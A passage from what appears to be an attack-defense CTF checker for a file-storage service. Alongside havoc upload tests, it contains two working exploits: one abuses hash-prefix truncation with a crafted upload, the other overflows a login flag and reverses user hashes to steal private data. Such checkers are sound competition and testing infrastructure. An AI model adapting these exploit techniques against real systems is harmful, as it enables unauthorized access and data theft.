    966async def havoc_bad_upload_ascii_v1(di: DependencyInjector) -> None:
    967    await test_bad_upload(di, "ascii", 1)
    968
    969
    970@checker.havoc(2)
    971async def havoc_bad_upload_ascii_v2(di: DependencyInjector) -> None:
    972    await test_bad_upload(di, "ascii", 2)
    973
    974
    975@checker.havoc(3)
    976async def havoc_bad_upload_ascii_v3(di: DependencyInjector) -> None:
    977    await test_bad_upload(di, "ascii", 3)
    978
    979
    980@checker.havoc(4)
    981async def havoc_good_upload_bin(di: DependencyInjector) -> None:
    982    await test_good_upload(di, "bin")
    983
    984
    985@checker.havoc(5)
    986async def havoc_bad_upload_bin_v1(di: DependencyInjector) -> None:
    987    await test_bad_upload(di, "bin", 1)
    988
    989
    990@checker.havoc(6)
    991async def havoc_bad_upload_bin_v2(di: DependencyInjector) -> None:
    992    await test_bad_upload(di, "bin", 2)
    993
    994
    995@checker.havoc(7)
    996async def havoc_bad_upload_bin_v3(di: DependencyInjector) -> None:
    997    await test_bad_upload(di, "bin", 3)
    998
    999
   1000@checker.havoc(8)
   1001async def havoc_bad_upload_garbage(di: DependencyInjector) -> None:
   1002    await test_bad_upload(di, "garbage", 1)
   1003
   1004
   1005@checker.havoc(9)
   1006async def havoc_hash_collision(di: DependencyInjector) -> None:
   1007    await test_hash_collision(di)
   1008
   1009
   1010@checker.exploit(0)
   1011async def exploit_prefix_truncation(
   1012    task: ExploitCheckerTaskMessage, di: DependencyInjector
   1013) -> bytes:
   1014    modelname = fakeid()
   1015    searcher = await di.get(FlagSearcher)
   1016
   1017    # Generate exploit payload using attack_info
   1018    assert task.attack_info is not None
   1019    target_prefix = task.attack_info.split()[1][:-2].encode()
   1020    evil_file = exploit_0_file_prefix + target_prefix + exploit_0_file_suffix
   1021
   1022    # Upload evil file
   1023    session = await di.get(Session)
   1024    await do_upload(session, modelname, stlfile=evil_file, check=True)
   1025    await do_search(session, modelname, download=False, check=True)
   1026
   1027    # Retrieve evil file for hash truncation
   1028    session.write(b"search last\n")
   1029    await session.drain()
   1030    resp = await session.readline()
   1031    if b"ERR:" in resp:
   1032        raise MumbleException("Searching for cached entry fails!")
   1033    resp += await session.readuntil(b"[q to quit]: ", ctx="reading search results")
   1034    filelist = [l.strip() for l in resp.split(b"\n")[:-1] if l.strip() != b""]
   1035    if len(filelist) == 0:
   1036        raise MumbleException("Failed to list files through search")
   1037
   1038    # Use it to enumerate other files and grab contents
   1039    flag = None
   1040    for fhash in filelist:
   1041        session.write(fhash + b"\n")
   1042        session.write(b"n\n")
   1043        await session.drain()
   1044        resp = await session.readline()
   1045        if b"ERR:" in resp:
   1046            session.logger.critical(f"Failed on selection of file: {resp!r}")
   1047            raise MumbleException("Failed to retrieve file contents via exploit")
   1048        resp += await session.readuntil(
   1049            b"==================", ctx="getting file info (1)"
   1050        )
   1051        resp += await session.readuntil(b"[q to quit]: ", ctx="getting file info (2)")
   1052        if flag := searcher.search_flag(resp):
   1053            break
   1054
   1055    # Done!
   1056    session.write(b"q\n")
   1057    await session.drain()
   1058    await session.readuntil(prompt)
   1059
   1060    if flag is not None:
   1061        return flag
   1062
   1063    raise MumbleException("Exploit for flagstore 1 failed")
   1064
   1065
   1066@checker.exploit(1)
   1067async def exploit_hash_overflow(
   1068    task: ExploitCheckerTaskMessage, di: DependencyInjector
   1069) -> None:
   1070    searcher = await di.get(FlagSearcher)
   1071    logger = await di.get(LoggerAdapter)
   1072
   1073    assert task.attack_info is not None
   1074    target_prefix = task.attack_info.split()[1][:-2].encode()
   1075
   1076    # Overflow loggedin variable
   1077    session = await di.get(Session)
   1078    session.write(b"search \xff\xff\xff\xff\xff0000000000000000\n")
   1079    await session.drain()
   1080    await session.readuntil(prompt, ctx="overflowing loggedin via search")
   1081    session.write(b"auth\n")
   1082    await session.drain()
   1083    resp = await session.readuntil(prompt, ctx="checking auth success")
   1084    if b"Already logged in!" not in resp:
   1085        raise MumbleException("Exploit did not set 'loggedin' variable via overflow")
   1086
   1087    # Get private user hashes via 'list'
   1088    resp = await do_list(session, check=True)
   1089    users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l]
   1090    await session.exit()
   1091
   1092    # Check if there is a flag in the response already
   1093    # (shouldn't be, enochecker_test will throw an error if this succeeds)
   1094    if flag := searcher.search_flag(resp):
   1095        return flag
   1096
   1097    logger.debug(f"Searching for user with prefix: {target_prefix!r}")
   1098    logger.debug(f"Possible users: {users!r}")
   1099
   1100    # Login as each private user
   1101    for userhash in users:
   1102        if not userhash.startswith(target_prefix):
   1103            continue
   1104
   1105        # Find preimage of user hash
   1106        authstr = reverse_hash(userhash.decode())
   1107
   1108        # Authenticate and check if the user is new
   1109        session = await di.get(Session)
   1110        logger.debug(f"Trying to login as user: {userhash!r}")
   1111        if not await do_auth(session, authstr, check=False, newuser=False):
   1112            await session.exit()
   1113            # We dont raise an exception, because it could be that user dir was cleaned
   1114            # up just before we logged in, not necessarily because of an invalid prehash.
   1115            # If there was a problem with the preimage generation, we wont find a flag and
   1116            # an exception will be raised later anways...
   1117            continue
   1118
   1119        # list all private files of user
   1120        resp = await do_list(session, check=True)
   1121        await session.exit()
   1122
   1123        # Search for flag in solid names
   1124        solidnames = b"\n".join(
   1125            [l.split(b": ", 1)[1] for l in resp.split(b"\n") if b"Solid Name: " in l]
   1126        )
   1127        if flag := searcher.search_flag(solidnames):
   1128            return flag
   1129
   1130    raise MumbleException("Exploit for flagstore 2 failed")
   1131
   1132
   1133if __name__ == "__main__":
   1134    checker.run(port=9091)